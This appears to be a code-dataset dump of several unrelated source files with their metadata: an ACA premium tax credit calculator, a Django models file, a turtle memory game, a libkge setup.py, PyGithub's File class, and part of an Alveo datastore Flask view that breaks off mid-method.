benchprem) yrnetpremium = actprem - yrtaxcredit print('Taxcredit => %.2f, Netpremium => %.2f [Monthly credit/premium: %.2f/%.2f]\n' % (yrtaxcredit, yrnetpremium, yrtaxcredit / 12, yrnetpremium / 12)) except EOFError: break ##################################################################################### # main: self test ##################################################################################### if __name__ == '__main__': test_mapRanges() test_povertyPercent() # comment-out to disable (see also 'trace' setting) test_ACApremiumTaxCredit() test_interactive()
<filename>PP4E-Examples-1.4/changes/book-web-site/snapshot-oct13/ACA_utils.py #!/usr/bin/python3 """ ===================================================================================== Compute ACA (a.k.a. "obamacare") health insurance premium tax credit from income, number people, actual and benchmark plan premiums, IRS povertylevel%=>contribution% mappings, and HHS poverty levels. Main entry point: credit = ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarkpremium) netpremium = actualpremium - credit Used to create functions in Excel for future year projections -- either as a prototype for translation to VBA, or usable directly with a plug-in like PyXLL or DataNitro. Requires inflation of some parematers in this role, not shown here. (Personally, the ACA law today means a 50% premiums increase with no offsetting tax credit, but later years may offset, and possibly eclipse, some of this cost increase.) Sources and resources: An online credit calculator -- http://www.wahbexchange.org/; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2012-05-23/pdf/2012-12421.pdf; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2013-05-03/pdf/2013-10463.pdf; HHS poverty bases -- http://aspe.hhs.gov/poverty/13poverty.cfm#guidelines; An overview -- http://www.cbpp.org/files/QA-on-Premium-Credits.pdf; An example -- http://consumersunion.org/wp-content/uploads/2013/05/Tax_Credit_Worksheet_2014.pdf Note: you should not take the results of this code as gospel (and should not use them for your taxes!); these are ballpark calculations only which may differ slightly from IRS final procedures, and are used for only rough estimation purposes in spreadsheet yearly projections. ===================================================================================== """ trace = print # or: lambda *args: None ##################################################################################### # poverty percent => pay percent (per IRS) ##################################################################################### # # Per IRS, for mapping income to insuree maximum premium contribution: # (Income/poverty)% low..high => MaxContributionIncome% low..high # IRSpovertyToContribRanges = [ [(0, 133), (2.0, 2.0) ], # povlow%..povhigh%, paylow%..payhigh% [(133, 150), (3.0, 4.0) ], # should this be 2.0..4.0?: not in IRS doc [(150, 200), (4.0, 6.3) ], [(200, 250), (6.3, 8.05)], [(250, 300), (8.05, 9.5) ], [(300, 400), (9.5, 9.5)]] # inclusive at 400, but not for 400.0001 def mapRanges(povpct, povlow, povhigh, paylow, payhigh): # 135, (133..150), (3.0..4.0) """ Evenly map povpct in [povlow..povhigh] to [paylow..payhigh]. All aruments and return value are scaled percentages (*100). See # comments to the right for an example's expected calcs. This scheme may or may not match the final IRS technique. """ povrange = povhigh - povlow # 17 = 150 - 133 payrange = payhigh - paylow # 1.0 = 4.0 - 3.0 povincr = povpct - povlow # 2 = 135 - 133 pctincr = povincr / povrange # pct = 2 / 17 paypct = paylow + (pctincr * payrange) # 3.0 + (pct * 1.0) return round(paypct, 2) # per IRS: round to nearest 100th def test_mapRanges(): for [(povlow, povhigh), (paylow, payhigh)] in IRSpovertyToContribRanges: for povpct in range(povlow, povhigh): paypct = mapRanges(povpct, povlow, povhigh, paylow, payhigh) print(povpct, '=>', paypct) print('-' * 40) assert mapRanges(210, 200, 250, 6.3, 8.05) == 6.65 # per IRS doc example assert mapRanges(135, 133, 150, 3.0, 4.0) == 3.12 # original dev example assert mapRanges(150, 150, 200, 4.0, 6.3) == 4.0 assert mapRanges(200, 150, 200, 4.0, 6.3) == 6.3 assert mapRanges(300, 300, 400, 9.5, 9.5) == 9.5 assert mapRanges(400, 300, 400, 9.5, 9.5) == 9.5 ##################################################################################### # income => poverty percent (per HHS) ##################################################################################### def povertyPercent(income, numpeople): """ Result is a percent * 100. Calculate poverty level base from income and size of household. This can change per year, and may or may not reflect inflation. """ HHSpovertyLevels = { 1: 11490, # or index a list[numpeople-1] 2: 15510, # 15510 = 62040 / 4 3: 19530, # 11490 = 45960 / 4 4: 23550, 5: 27570, 6: 31590, # VB: must inflate levels? 7: 35610, 8: 39630} if numpeople in HHSpovertyLevels: povlevel = HHSpovertyLevels[numpeople] else: povlevel = HHSpovertyLevels[8] + (4020 * (numpeople - 8)) return (income / povlevel) * 100 testincomes = (100000, 62039, 62040, 62041, # +$1 income = $0 credit threshhold for 2 ppl! 45959, 45960, 45961, # +$1 income = $0 credit thresshold for 1 ppl! 22980, 52988, # see asserts ahead 40000, 31021, 31020, 20000, 10000) def test_povertyPercent(): print('=' * 40) for numpeople in (2, 1): for income in testincomes: print(numpeople, income, '=>', povertyPercent(income, numpeople)) print('=' * 40) ##################################################################################### # income => taxcredit (combine tools) ##################################################################################### def applyContribRanges(povpct): """ Calculate max premium contribution % from poverty %. Result and inputs are both scaled percents (* 100). """ lenofranges = len(IRSpovertyToContribRanges) countranges = enumerate(IRSpovertyToContribRanges) for row, [(povlow, povhigh), (paylow, payhigh)] in countranges: lastrow = (row+1 == lenofranges) if lastrow: inrange = (povlow <= povpct <= povhigh) # VB: x <= y and y <= z else: inrange = (povlow <= povpct < povhigh) if inrange: paypct = mapRanges(povpct, povlow, povhigh, paylow, payhigh) trace('(%.2f => %.2f)' % (povpct, paypct)) return paypct return 100 # > high end of ranges: no tax credit offset, pays premium in full def insureePremiumContribution(income, numpeople): """ Calculate insuree's maximum premium contribution $ from income, poverty levels, and contribution percent ranges. """ povertyPct = povertyPercent(income, numpeople) contribPct = applyContribRanges(povertyPct) contribAmt = income * (contribPct / 100) trace('[%s, %s => %.2f, %.2f, %.2f]' % (income, numpeople, contribPct, contribAmt, contribAmt/12)) return contribAmt def ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarksilverpremium): """ ============================================================================ MAIN ENTRY POINT: calculate the premium credit, for Excel formulas. All values here are give as yearly/annual amounts, not monthly. Caveats: --does not handle Medicaid cutoff at 100/133% of poverty line. --does nothing about uneven monthly amounts or prepayments. --really computed for -prior- year from payments and old plans. --does nothing for cost-sharing subsidies for out-of-pockets. --may differ slightly from IRS due to rounding errors. --some aspects very per location but are ignored or givens here. Not taxcredit = max(0, (yourpremium - contribution(income, numpeople)): Raw tax credit is difference between the benchmark silver plan's premium for area and the insurees's maximum contribution calculated from income and family size (not insuree premium - contribution). This credit can then be applied to actual premiums regardless of plan (and may hence decrease or increase actual insuree premium contribution), but is capped at the total actual plan cost paid. Thus, calculating tax credits and plan net cost requires income details, plus two plan premiums for your area per year: insuree's actual, and "benchmark" silver plan, in addition to each year's expected poverty line data. There are 6 permutations of the ap, bp, and yc premium and contibution variables, only 2 of which (plus their equality cases) are truly valid: [ap >= bp >= c] (ex:gold>silver) and [bp >= ap >= c] (ex:bronze<silver). ============================================================================ Per final? IRS docs... § 1.36B–3 Computing the premium assistance credit amount. a) In general. A taxpayer’s premium assistance credit amount for a taxable year is the sum of the premium assistance amounts determined under paragraph (d) of this section for all coverage months for individuals in the taxpayer’s family. ... (d) ***Premium assistance amount. The premium assistance amount for a coverage month is the lesser of— (1) The premiums for the month for one or more qualified health plans in which a taxpayer or a member of the taxpayer’s family enrolls; or (2) The excess of the adjusted monthly premium for the applicable benchmark plan over 1/12 of the product of a taxpayer’s household income and the applicable percentage for the taxable year. ... (f) Applicable benchmark plan—(1) In general. Except as otherwise provided in this paragraph (f), the applicable benchmark plan for each coverage month is the second lowest cost silver plan ... offered through the Exchange for the rating area where the taxpayer resides ... ============================================================================ """ contributionbase = insureePremiumContribution(income, numpeople) benchmarkexcess = max(0, benchmarksilverpremium - contributionbase) taxcredit = min(actualpremium, benchmarkexcess) netpremium = actualpremium - taxcredit # VB: must inflate premiums return taxcredit # VB: netpremium not returned def test_ACApremiumTaxCredit(): """ Actual insuree and benchmark annual premiums will be taken from spreadsheet table cells in Excel (and possibly inflated for future years): hardcode/estimate here. """ examplepremiums = (431, 816) for numpeople in (2, 1): benchprem = examplepremiums[numpeople-1] * 12 # 2nd lowest silver for area actualprem = benchprem - (100 * 12) # bronze est: $100/mo < silver print('-' * 79) for income in testincomes: print('ppl=%d, inc=%d' % (numpeople, income)) yrtaxcredit = ACApremiumTaxCredit(income, numpeople, actualprem, benchprem) yrnetpremium = actualprem - yrtaxcredit print('** [Month: %d (prem) = %.2f (tax) + %.2f (you)] [Year: %d=%d+%d]\n' % (actualprem/12, yrtaxcredit/12, yrnetpremium/12, actualprem, yrtaxcredit, yrnetpremium)) global trace trace = lambda *args: None assert round(ACApremiumTaxCredit(22980,1,5000,5000), 2) == 3552.26 # actual = benchmark, 200% pov assert round(ACApremiumTaxCredit(22980,1,4500,5000), 2) == 3552.26 # actual < benchmark assert round(ACApremiumTaxCredit(22980,1,3500,5000), 2) == 3500.00 assert round(ACApremiumTaxCredit(22980,1,1000,5000), 2) == 1000.00 assert round(ACApremiumTaxCredit(22980,1,6000,5000), 2) == 3552.26 # actual > benchmark assert round(ACApremiumTaxCredit(22980,1,10000,5000),2) == 3552.26 assert round(ACApremiumTaxCredit(22980,1,1448,5000), 2) == 1448.00 # actual near contribution assert round(ACApremiumTaxCredit(22980,1,1447,5000), 2) == 1447.00 assert round(ACApremiumTaxCredit(22980,1,5,5000), 2) == 5.00 # unlikely but true assert round(ACApremiumTaxCredit(52988,4,15000,15000), 2) == 11195.46 # 225%: 15000=11195+3804 assert round(ACApremiumTaxCredit(62039,2,8592,9792), 2) == 3898.30 # 399.99%: 8592=3898+4693 (716,816) assert round(ACApremiumTaxCredit(62040,2,8592,9792), 2) == 3898.20 # 400.00%: 8592=3898+4693 (716,816) assert round(ACApremiumTaxCredit(62041,2,8592,9792), 2) == 0 # MASSIVE $4k DROPOFF FOR $1 INCOME! assert round(ACApremiumTaxCredit(94200,4,12000,13200), 2) == 4251.00 # 400%: 12k=4251+7749 (354/645) assert round(ACApremiumTaxCredit(94199,4,12000,13200), 2) == 4251.09 # 400%: ditto assert round(ACApremiumTaxCredit(94201,4,12000,13200), 2) == 0 # MASSIVE DROPOFF FOR 4: (0/1000) trace = print def test_interactive(): """ Test main function with interactively entered parameters. """ print('*' * 80) while True: try: reply = input('[income,people,actprem,benchprem]? ') if not reply: break income, numpeople, actprem, benchprem = [int(x) for x in reply.split(',')] yrtaxcredit = ACApremiumTaxCredit(income, numpeople, actprem, benchprem) yrnetpremium = actprem - yrtaxcredit print('Taxcredit => %.2f, Netpremium => %.2f [Monthly credit/premium: %.2f/%.2f]\n' % (yrtaxcredit, yrnetpremium, yrtaxcredit / 12, yrnetpremium / 12)) except EOFError: break ##################################################################################### # main: self test ##################################################################################### if __name__ == '__main__': test_mapRanges() test_povertyPercent() # comment-out to disable (see also 'trace' setting) test_ACApremiumTaxCredit() test_interactive()
en
0.703796
#!/usr/bin/python3 ===================================================================================== Compute ACA (a.k.a. "obamacare") health insurance premium tax credit from income, number people, actual and benchmark plan premiums, IRS povertylevel%=>contribution% mappings, and HHS poverty levels. Main entry point: credit = ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarkpremium) netpremium = actualpremium - credit Used to create functions in Excel for future year projections -- either as a prototype for translation to VBA, or usable directly with a plug-in like PyXLL or DataNitro. Requires inflation of some parematers in this role, not shown here. (Personally, the ACA law today means a 50% premiums increase with no offsetting tax credit, but later years may offset, and possibly eclipse, some of this cost increase.) Sources and resources: An online credit calculator -- http://www.wahbexchange.org/; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2012-05-23/pdf/2012-12421.pdf; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2013-05-03/pdf/2013-10463.pdf; HHS poverty bases -- http://aspe.hhs.gov/poverty/13poverty.cfm#guidelines; An overview -- http://www.cbpp.org/files/QA-on-Premium-Credits.pdf; An example -- http://consumersunion.org/wp-content/uploads/2013/05/Tax_Credit_Worksheet_2014.pdf Note: you should not take the results of this code as gospel (and should not use them for your taxes!); these are ballpark calculations only which may differ slightly from IRS final procedures, and are used for only rough estimation purposes in spreadsheet yearly projections. ===================================================================================== # or: lambda *args: None ##################################################################################### # poverty percent => pay percent (per IRS) ##################################################################################### # # Per IRS, for mapping income to insuree maximum premium contribution: # (Income/poverty)% low..high => MaxContributionIncome% low..high # # povlow%..povhigh%, paylow%..payhigh% # should this be 2.0..4.0?: not in IRS doc # inclusive at 400, but not for 400.0001 # 135, (133..150), (3.0..4.0) Evenly map povpct in [povlow..povhigh] to [paylow..payhigh]. All aruments and return value are scaled percentages (*100). See # comments to the right for an example's expected calcs. This scheme may or may not match the final IRS technique. # 17 = 150 - 133 # 1.0 = 4.0 - 3.0 # 2 = 135 - 133 # pct = 2 / 17 # 3.0 + (pct * 1.0) # per IRS: round to nearest 100th # per IRS doc example # original dev example ##################################################################################### # income => poverty percent (per HHS) ##################################################################################### Result is a percent * 100. Calculate poverty level base from income and size of household. This can change per year, and may or may not reflect inflation. # or index a list[numpeople-1] # 15510 = 62040 / 4 # 11490 = 45960 / 4 # VB: must inflate levels? # +$1 income = $0 credit threshhold for 2 ppl! # +$1 income = $0 credit thresshold for 1 ppl! # see asserts ahead ##################################################################################### # income => taxcredit (combine tools) ##################################################################################### Calculate max premium contribution % from poverty %. Result and inputs are both scaled percents (* 100). # VB: x <= y and y <= z # > high end of ranges: no tax credit offset, pays premium in full Calculate insuree's maximum premium contribution $ from income, poverty levels, and contribution percent ranges. ============================================================================ MAIN ENTRY POINT: calculate the premium credit, for Excel formulas. All values here are give as yearly/annual amounts, not monthly. Caveats: --does not handle Medicaid cutoff at 100/133% of poverty line. --does nothing about uneven monthly amounts or prepayments. --really computed for -prior- year from payments and old plans. --does nothing for cost-sharing subsidies for out-of-pockets. --may differ slightly from IRS due to rounding errors. --some aspects very per location but are ignored or givens here. Not taxcredit = max(0, (yourpremium - contribution(income, numpeople)): Raw tax credit is difference between the benchmark silver plan's premium for area and the insurees's maximum contribution calculated from income and family size (not insuree premium - contribution). This credit can then be applied to actual premiums regardless of plan (and may hence decrease or increase actual insuree premium contribution), but is capped at the total actual plan cost paid. Thus, calculating tax credits and plan net cost requires income details, plus two plan premiums for your area per year: insuree's actual, and "benchmark" silver plan, in addition to each year's expected poverty line data. There are 6 permutations of the ap, bp, and yc premium and contibution variables, only 2 of which (plus their equality cases) are truly valid: [ap >= bp >= c] (ex:gold>silver) and [bp >= ap >= c] (ex:bronze<silver). ============================================================================ Per final? IRS docs... § 1.36B–3 Computing the premium assistance credit amount. a) In general. A taxpayer’s premium assistance credit amount for a taxable year is the sum of the premium assistance amounts determined under paragraph (d) of this section for all coverage months for individuals in the taxpayer’s family. ... (d) ***Premium assistance amount. The premium assistance amount for a coverage month is the lesser of— (1) The premiums for the month for one or more qualified health plans in which a taxpayer or a member of the taxpayer’s family enrolls; or (2) The excess of the adjusted monthly premium for the applicable benchmark plan over 1/12 of the product of a taxpayer’s household income and the applicable percentage for the taxable year. ... (f) Applicable benchmark plan—(1) In general. Except as otherwise provided in this paragraph (f), the applicable benchmark plan for each coverage month is the second lowest cost silver plan ... offered through the Exchange for the rating area where the taxpayer resides ... ============================================================================ # VB: must inflate premiums # VB: netpremium not returned Actual insuree and benchmark annual premiums will be taken from spreadsheet table cells in Excel (and possibly inflated for future years): hardcode/estimate here. # 2nd lowest silver for area # bronze est: $100/mo < silver # actual = benchmark, 200% pov # actual < benchmark # actual > benchmark # actual near contribution # unlikely but true # 225%: 15000=11195+3804 # 399.99%: 8592=3898+4693 (716,816) # 400.00%: 8592=3898+4693 (716,816) # MASSIVE $4k DROPOFF FOR $1 INCOME! # 400%: 12k=4251+7749 (354/645) # 400%: ditto # MASSIVE DROPOFF FOR 4: (0/1000) Test main function with interactively entered parameters. ##################################################################################### # main: self test ##################################################################################### # comment-out to disable (see also 'trace' setting)
2.037086
2
welcome/models.py
fathtus/abc
0
6629017
from django.db import models from django.forms import ModelForm # Create your models here. class PageView(models.Model): hostname = models.CharField(max_length=32) timestamp = models.DateTimeField(auto_now_add=True) TITLE_CHOICES = ( ('MR', 'Mr.'), ('MRS', 'Mrs.'), ('MS', 'Ms.'), ) class Author(models.Model): name = models.CharField(max_length=100) title = models.CharField(max_length=3, choices=TITLE_CHOICES) birth_date = models.DateField(blank=True, null=True) def __str__(self): return self.name class Book(models.Model): name = models.CharField(max_length=100) authors = models.ManyToManyField(Author) class AuthorForm(ModelForm): class Meta: model = Author fields = ['name', 'title'] class BookForm(ModelForm): class Meta: model = Book fields = ['name', 'authors']
from django.db import models from django.forms import ModelForm # Create your models here. class PageView(models.Model): hostname = models.CharField(max_length=32) timestamp = models.DateTimeField(auto_now_add=True) TITLE_CHOICES = ( ('MR', 'Mr.'), ('MRS', 'Mrs.'), ('MS', 'Ms.'), ) class Author(models.Model): name = models.CharField(max_length=100) title = models.CharField(max_length=3, choices=TITLE_CHOICES) birth_date = models.DateField(blank=True, null=True) def __str__(self): return self.name class Book(models.Model): name = models.CharField(max_length=100) authors = models.ManyToManyField(Author) class AuthorForm(ModelForm): class Meta: model = Author fields = ['name', 'title'] class BookForm(ModelForm): class Meta: model = Book fields = ['name', 'authors']
en
0.963489
# Create your models here.
2.683809
3
Python/memory.py
A01352283/TC1001S.100-202211
0
6629018
"""Memory, puzzle game of number pairs. Exercises: 1. Count and print how many taps occur. 2. Decrease the number of tiles to a 4x4 grid. 3. Detect when all tiles are revealed. 4. Center single-digit tile. 5. Use letters instead of tiles. """ from random import * from turtle import * from freegames import path mountain = path('car.gif') tiles = list(range(32)) * 2 state = {'mark': None} hide = [True] * 64 def square(x, y): "Draw white square with black outline at (x, y)." up() goto(x, y) down() color('red', 'white') begin_fill() for count in range(4): forward(50) left(90) end_fill() def index(x, y): "Convert (x, y) coordinates to tiles index." return int((x + 200) // 50 + ((y + 200) // 50) * 8) def xy(count): "Convert tiles count to (x, y) coordinates." return (count % 8) * 50 - 200, (count // 8) * 50 - 200 def tap(x, y): "Update mark and hidden tiles based on tap." spot = index(x, y) mark = state['mark'] if mark is None or mark == spot or tiles[mark] != tiles[spot]: state['mark'] = spot else: hide[spot] = False hide[mark] = False state['mark'] = None def draw(): "Draw image and tiles." clear() goto(0, 0) shape(mountain) stamp() for count in range(64): if hide[count]: x, y = xy(count) square(x, y) mark = state['mark'] if mark is not None and hide[mark]: x, y = xy(mark) up() goto(x + 2, y) color('blue') write(tiles[mark], font=('Verdana', 24, 'normal', 'bold', 'italic')) update() ontimer(draw, 100) shuffle(tiles) setup(420, 420, 370, 0) addshape(mountain) hideturtle() tracer(False) onscreenclick(tap) draw() done()
"""Memory, puzzle game of number pairs. Exercises: 1. Count and print how many taps occur. 2. Decrease the number of tiles to a 4x4 grid. 3. Detect when all tiles are revealed. 4. Center single-digit tile. 5. Use letters instead of tiles. """ from random import * from turtle import * from freegames import path mountain = path('car.gif') tiles = list(range(32)) * 2 state = {'mark': None} hide = [True] * 64 def square(x, y): "Draw white square with black outline at (x, y)." up() goto(x, y) down() color('red', 'white') begin_fill() for count in range(4): forward(50) left(90) end_fill() def index(x, y): "Convert (x, y) coordinates to tiles index." return int((x + 200) // 50 + ((y + 200) // 50) * 8) def xy(count): "Convert tiles count to (x, y) coordinates." return (count % 8) * 50 - 200, (count // 8) * 50 - 200 def tap(x, y): "Update mark and hidden tiles based on tap." spot = index(x, y) mark = state['mark'] if mark is None or mark == spot or tiles[mark] != tiles[spot]: state['mark'] = spot else: hide[spot] = False hide[mark] = False state['mark'] = None def draw(): "Draw image and tiles." clear() goto(0, 0) shape(mountain) stamp() for count in range(64): if hide[count]: x, y = xy(count) square(x, y) mark = state['mark'] if mark is not None and hide[mark]: x, y = xy(mark) up() goto(x + 2, y) color('blue') write(tiles[mark], font=('Verdana', 24, 'normal', 'bold', 'italic')) update() ontimer(draw, 100) shuffle(tiles) setup(420, 420, 370, 0) addshape(mountain) hideturtle() tracer(False) onscreenclick(tap) draw() done()
en
0.809697
Memory, puzzle game of number pairs. Exercises: 1. Count and print how many taps occur. 2. Decrease the number of tiles to a 4x4 grid. 3. Detect when all tiles are revealed. 4. Center single-digit tile. 5. Use letters instead of tiles.
3.786451
4
setup.py
samuelbroscheit/kge
0
6629019
<reponame>samuelbroscheit/kge from setuptools import setup setup( name="libkge", version="0.1", description="A knowledge graph embedding library", url="https://github.com/uma-pi1/kge", author="<NAME>", author_email="<EMAIL>", packages=["kge"], install_requires=[ "torch>=1.3.1", "pyyaml", "pandas", "argparse", "path.py", "ax-platform>=0.1.6", "sqlalchemy", "torchviz", "dataclasses", # LibKGE uses numba typed-dicts which is part of the experimental numba API # in version 0.48 # see http://numba.pydata.org/numba-doc/0.48.0/reference/pysupported.html "numba==0.48.0" ], zip_safe=False, entry_points={ "console_scripts": [ "kge = kge.cli:main", ], }, )
from setuptools import setup setup( name="libkge", version="0.1", description="A knowledge graph embedding library", url="https://github.com/uma-pi1/kge", author="<NAME>", author_email="<EMAIL>", packages=["kge"], install_requires=[ "torch>=1.3.1", "pyyaml", "pandas", "argparse", "path.py", "ax-platform>=0.1.6", "sqlalchemy", "torchviz", "dataclasses", # LibKGE uses numba typed-dicts which is part of the experimental numba API # in version 0.48 # see http://numba.pydata.org/numba-doc/0.48.0/reference/pysupported.html "numba==0.48.0" ], zip_safe=False, entry_points={ "console_scripts": [ "kge = kge.cli:main", ], }, )
en
0.703964
# LibKGE uses numba typed-dicts which is part of the experimental numba API # in version 0.48 # see http://numba.pydata.org/numba-doc/0.48.0/reference/pysupported.html
1.498927
1
venv/lib/python2.7/site-packages/github/File.py
sravani-m/Web-Application-Security-Framework
3
6629020
<filename>venv/lib/python2.7/site-packages/github/File.py # -*- coding: utf-8 -*- ############################ Copyrights and license ############################ # # # Copyright 2012 <NAME> <<EMAIL>> # # Copyright 2012 Zearin <<EMAIL>> # # Copyright 2013 AKFish <<EMAIL>> # # Copyright 2013 <NAME> <<EMAIL>> # # # # This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ # # # # PyGithub is free software: you can redistribute it and/or modify it under # # the terms of the GNU Lesser General Public License as published by the Free # # Software Foundation, either version 3 of the License, or (at your option) # # any later version. # # # # PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY # # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # # details. # # # # You should have received a copy of the GNU Lesser General Public License # # along with PyGithub. If not, see <http://www.gnu.org/licenses/>. # # # ################################################################################ import github.GithubObject class File(github.GithubObject.NonCompletableGithubObject): """ This class represents Files as returned for example by http://developer.github.com/v3/todo """ @property def additions(self): """ :type: integer """ return self._additions.value @property def blob_url(self): """ :type: string """ return self._blob_url.value @property def changes(self): """ :type: integer """ return self._changes.value @property def contents_url(self): """ :type: string """ return self._contents_url.value @property def deletions(self): """ :type: integer """ return self._deletions.value @property def filename(self): """ :type: string """ return self._filename.value @property def patch(self): """ :type: string """ return self._patch.value @property def raw_url(self): """ :type: string """ return self._raw_url.value @property def sha(self): """ :type: string """ return self._sha.value @property def status(self): """ :type: string """ return self._status.value def _initAttributes(self): self._additions = github.GithubObject.NotSet self._blob_url = github.GithubObject.NotSet self._changes = github.GithubObject.NotSet self._contents_url = github.GithubObject.NotSet self._deletions = github.GithubObject.NotSet self._filename = github.GithubObject.NotSet self._patch = github.GithubObject.NotSet self._raw_url = github.GithubObject.NotSet self._sha = github.GithubObject.NotSet self._status = github.GithubObject.NotSet def _useAttributes(self, attributes): if "additions" in attributes: # pragma no branch self._additions = self._makeIntAttribute(attributes["additions"]) if "blob_url" in attributes: # pragma no branch self._blob_url = self._makeStringAttribute(attributes["blob_url"]) if "changes" in attributes: # pragma no branch self._changes = self._makeIntAttribute(attributes["changes"]) if "contents_url" in attributes: # pragma no branch self._contents_url = self._makeStringAttribute(attributes["contents_url"]) if "deletions" in attributes: # pragma no branch self._deletions = self._makeIntAttribute(attributes["deletions"]) if "filename" in attributes: # pragma no branch self._filename = self._makeStringAttribute(attributes["filename"]) if "patch" in attributes: # pragma no branch self._patch = self._makeStringAttribute(attributes["patch"]) if "raw_url" in attributes: # pragma no branch self._raw_url = self._makeStringAttribute(attributes["raw_url"]) if "sha" in attributes: # pragma no branch self._sha = self._makeStringAttribute(attributes["sha"]) if "status" in attributes: # pragma no branch self._status = self._makeStringAttribute(attributes["status"])
<filename>venv/lib/python2.7/site-packages/github/File.py # -*- coding: utf-8 -*- ############################ Copyrights and license ############################ # # # Copyright 2012 <NAME> <<EMAIL>> # # Copyright 2012 Zearin <<EMAIL>> # # Copyright 2013 AKFish <<EMAIL>> # # Copyright 2013 <NAME> <<EMAIL>> # # # # This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ # # # # PyGithub is free software: you can redistribute it and/or modify it under # # the terms of the GNU Lesser General Public License as published by the Free # # Software Foundation, either version 3 of the License, or (at your option) # # any later version. # # # # PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY # # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # # details. # # # # You should have received a copy of the GNU Lesser General Public License # # along with PyGithub. If not, see <http://www.gnu.org/licenses/>. # # # ################################################################################ import github.GithubObject class File(github.GithubObject.NonCompletableGithubObject): """ This class represents Files as returned for example by http://developer.github.com/v3/todo """ @property def additions(self): """ :type: integer """ return self._additions.value @property def blob_url(self): """ :type: string """ return self._blob_url.value @property def changes(self): """ :type: integer """ return self._changes.value @property def contents_url(self): """ :type: string """ return self._contents_url.value @property def deletions(self): """ :type: integer """ return self._deletions.value @property def filename(self): """ :type: string """ return self._filename.value @property def patch(self): """ :type: string """ return self._patch.value @property def raw_url(self): """ :type: string """ return self._raw_url.value @property def sha(self): """ :type: string """ return self._sha.value @property def status(self): """ :type: string """ return self._status.value def _initAttributes(self): self._additions = github.GithubObject.NotSet self._blob_url = github.GithubObject.NotSet self._changes = github.GithubObject.NotSet self._contents_url = github.GithubObject.NotSet self._deletions = github.GithubObject.NotSet self._filename = github.GithubObject.NotSet self._patch = github.GithubObject.NotSet self._raw_url = github.GithubObject.NotSet self._sha = github.GithubObject.NotSet self._status = github.GithubObject.NotSet def _useAttributes(self, attributes): if "additions" in attributes: # pragma no branch self._additions = self._makeIntAttribute(attributes["additions"]) if "blob_url" in attributes: # pragma no branch self._blob_url = self._makeStringAttribute(attributes["blob_url"]) if "changes" in attributes: # pragma no branch self._changes = self._makeIntAttribute(attributes["changes"]) if "contents_url" in attributes: # pragma no branch self._contents_url = self._makeStringAttribute(attributes["contents_url"]) if "deletions" in attributes: # pragma no branch self._deletions = self._makeIntAttribute(attributes["deletions"]) if "filename" in attributes: # pragma no branch self._filename = self._makeStringAttribute(attributes["filename"]) if "patch" in attributes: # pragma no branch self._patch = self._makeStringAttribute(attributes["patch"]) if "raw_url" in attributes: # pragma no branch self._raw_url = self._makeStringAttribute(attributes["raw_url"]) if "sha" in attributes: # pragma no branch self._sha = self._makeStringAttribute(attributes["sha"]) if "status" in attributes: # pragma no branch self._status = self._makeStringAttribute(attributes["status"])
en
0.644241
# -*- coding: utf-8 -*- ############################ Copyrights and license ############################ # # # Copyright 2012 <NAME> <<EMAIL>> # # Copyright 2012 Zearin <<EMAIL>> # # Copyright 2013 AKFish <<EMAIL>> # # Copyright 2013 <NAME> <<EMAIL>> # # # # This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ # # # # PyGithub is free software: you can redistribute it and/or modify it under # # the terms of the GNU Lesser General Public License as published by the Free # # Software Foundation, either version 3 of the License, or (at your option) # # any later version. # # # # PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY # # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # # details. # # # # You should have received a copy of the GNU Lesser General Public License # # along with PyGithub. If not, see <http://www.gnu.org/licenses/>. # # # ################################################################################ This class represents Files as returned for example by http://developer.github.com/v3/todo :type: integer :type: string :type: integer :type: string :type: integer :type: string :type: string :type: string :type: string :type: string # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch
1.750119
2
application/alveo/views/datastore/store.py
Alveo/alveo-transcriber-services
1
6629021
<gh_stars>1-10 import json import uuid import datetime from flask import g, abort from application import db from application.users.model import User from application.datastore.model import Datastore from application.alveo.module import DOMAIN, SUPPORTED_STORAGE_KEYS from application.auth.required import auth_required from application.datastore.view_wrappers.store import StoreWrapper from application import limiter class AlveoStoreRoute(StoreWrapper): decorators = [ auth_required, limiter.limit("1000 per minute"), limiter.limit("20000 per hour"), limiter.limit("100000 per day") ] def _processor_get(self, object_id, user_id=None, version=None): query = Datastore.query.filter(Datastore.id == object_id).first() if query is None: abort(404, 'No match for the provided id') user = User.query.filter(User.id == query.user_id).first() if not user.domain == DOMAIN: abort( 403, 'You don\'t have permission to read the storage of an external user') base_query = query if version != None: try: query = query.versions[version] except: abort(404, 'Version doesn\'t exist for provided id') else: version = query.versions.count() - 1 data = json.loads(query.value.decode()) original_author = base_query.versions[0].user total_versions = base_query.versions.count() version_author = query.user return { 'id': query.id, 'key': str(query.key.split(':', 1)[1]), 'version': version, 'total_versions': total_versions, 'transcription': data, 'alias': query.alias, 'annotations_total': len(data), 'timestamp': query.timestamp.isoformat(), 'storage_spec': query.storage_spec, 'author': { 'original': { 'ats_id': original_author.id, 'domain': original_author.domain, 'remote_id': original_author.remote_id }, 'version': { 'ats_id': version_author.id, 'domain': version_author.domain, 'remote_id': version_author.remote_id } } } def _processor_post(self, key, value, storage_spec, alias=None): if key is None or len(key) < 2: abort(400, 'Key is invalid or too short') if alias is None or len(alias) < 1: alias = "default" validate_data(value) key = '%s:%s' % (DOMAIN, key) model = Datastore.query.filter( Datastore.key == key).filter( Datastore.alias == alias).filter( Datastore.user_id == g.user.id).first() data = json.dumps(value) if model is None: model = Datastore(key, data, storage_spec, g.user, alias) db.session.add(model) else: model.set_value(data) 